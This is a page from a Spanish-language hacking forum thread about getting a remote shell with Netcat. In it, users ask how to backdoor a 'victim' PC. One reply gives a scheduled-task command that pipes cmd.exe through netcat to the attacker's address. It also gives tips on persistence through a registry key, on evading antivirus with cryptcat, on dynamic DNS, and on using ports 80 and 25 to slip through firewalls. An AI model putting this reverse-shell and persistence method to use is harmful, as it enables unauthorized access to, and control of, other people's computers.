elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 17:36  

Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  Paper: Obtener shell con Netcat
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [17] Ir Abajo Respuesta Imprimir
Autor Tema: Paper: Obtener shell con Netcat  (Leído 121,947 veces)
huervano

Desconectado Desconectado

Ver Perfil
Re: Paper: Obtener shell con Netcat
« Respuesta #240 en: 9 Julio 2009, 10:26 »

yo tengo el siguiente problema....

intento hacer la shell -vv xxx.xxx.x.xxx puerto y nada de nada me sale
sent 0, rcvd 0: NOTSOCK

he probado muchos puertos y el que tengo actualmente abierto segun me dice por paginas de internet e incluso el puerto 25, yo recibo pero no envio.

tengo el NC en system32 pero la otra maquina no la tiene es por eso??? si es asi como podria tener su shell??
Isasu

Ver Perfil
« Respuesta #241 en: 12 Julio 2009, 03:04 »

bueno gracias iguall ;D
EtXeBe-X

Gazte, topau giñen...

Ver Perfil
« Respuesta #242 en: 14 Julio 2009, 01:43 »

Gracias por este paper!! pero me ha surgido una duda...la victima debe tener el Netcat en su pc??Es que me pierdo a la hora de leer, que al hacer la conexion de forma directa, hay que dejar a la victima en escucha....y si no tienen Netcat, como es posible??

Perdon por mi ignorancia, un saludo!
softdates

Ver Perfil
Recontra Paper: Obtener shell con Netcat
« Respuesta #243 en: 15 Julio 2009, 05:53 »

todo sobre netcat

desde hace mas de unos 5 años ya es un programa viejo y recontraconocido por los antivirus pero igual les dejo un link http://www.usuarios.lycos.es/orlyyan/ hay una recopilacion interesante.
arkad2008

Ver Perfil
« Respuesta #244 en: 31 Julio 2009, 07:35 »

Hola a todos,

Espero que despues tanto tiempo esta tecnica todavia funcione y que alguien me pueda responder una inquietud muy basica:

He estado intentando crear una puerta trasera en un equipo remoto, creando una llave de registro, sin embargo, en mi propia PC solo me funciona si tengo el netcat a la escucha en el instante mismo de ejecutar el "netcat troyanizado".

La verdad es que no he podido entender donde exactamente es que se escriben las lineas del comando "at" para que se ejecute a una determinada hora. Y... ¿si lo dejo con la sola llave de registro sin "at" tendria que conectarse todos los dias cuando mi victima inicie win y yo este a le escucha? Si es asi, tristemente debo decir que no me funciona pues se la hora en que se enciende ese equipo, me puesto a la escucha y ...nada.

Muchas gracias
Dokuz

Ver Perfil WWW
« Respuesta #245 en: 31 Julio 2009, 08:33 »

Hola arkad2008 la tecnica funciona el netcat algunos av lo agarran si queres podes probar tambien con el cryptcat es como el netcat pero es un poco mejor menos detectado y eso, pero para el caso es lo mismo.

Con respecto a la duda que tienes sobre si tenes que dejar a la escucha tu pc al momento que la pc victima ejecuta el netcat troyanizado, si tienes que tener tu pc a la escucha si no como tu dices no sirve ponerte a la escucha despues. Simplemente por que el netcat ya mando la "señal" para conectar pero tu pc no estaba y como ya fue ejecutado una vez no se vuelve a ejecutar o a pedir la "señal" de conectar a menos que el dueño de la pc lo ejecute aproposito cosa que no creo o que se le reinicie la pc xD
pero eso se resuelve facil como muestra en el tutorial con el programador de tareas de windows podes hacer que se ejecute a determinada hora de x dia.
Código:
at 6:00p /every:1 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""
para que funcione eso solamente lo agregas en tu batch entonces cuando se prenda la pc ejecuta el batch gracias a la llave que dejaste en el registro, al ejecutar el batch leera esa linea de codigo y programara automaticamente el programador de tareas de windows para que ejecute el netcat ese día a esa hora, acuerdate la fecha y dia que pones asi tienes tu pc lista a la escucha ya que saves que se va a ejecutar el netcat troyanizado.
Es recomedable que pongas que se ejecute los 30 dias del mes a una hora diamos 6:00 pm.

Por último tienes que tener encuenta si tu ip es dinamica o fija si es dinamica osea que cambias de ip cada vez que te conectas es recomendable que te hagas un no-ip si no cuando cambiaras tu ip el netcat troyanizado nunca se conectaria contigo y tene en cuenta que debes usar el puerto 80 o 25 que son los permitidos.

Si tienes más dudas o no me entiendes algo dime que con gusto las respondere.

Saludos  ;D

Ultimos Avances | Noticias de Tecnología, Informatica e Inventos  UltimosAvances.com
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [17] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Obtener shell con Cryptcat o Netcat
Hacking Básico
Devilboy.Devil 5 2,163 Último mensaje 29 Enero 2011, 22:41
por Garfield07
Como obtener varias shell remotas a la vez usando NETCAT?
Hacking Básico
๖ۣۜPą||ムđ1ůɱ 5 1,701 Último mensaje 10 Julio 2011, 19:22
por .:UND3R:.
Netcat Archivos Shell
Hacking Básico
Mardorx 4 1,670 Último mensaje 25 Mayo 2011, 01:06
por tragantras
Obtener shell en un servidor NFS
Hacking Linux/Unix
davidzodelin 0 580 Último mensaje 25 Enero 2012, 03:37
por davidzodelin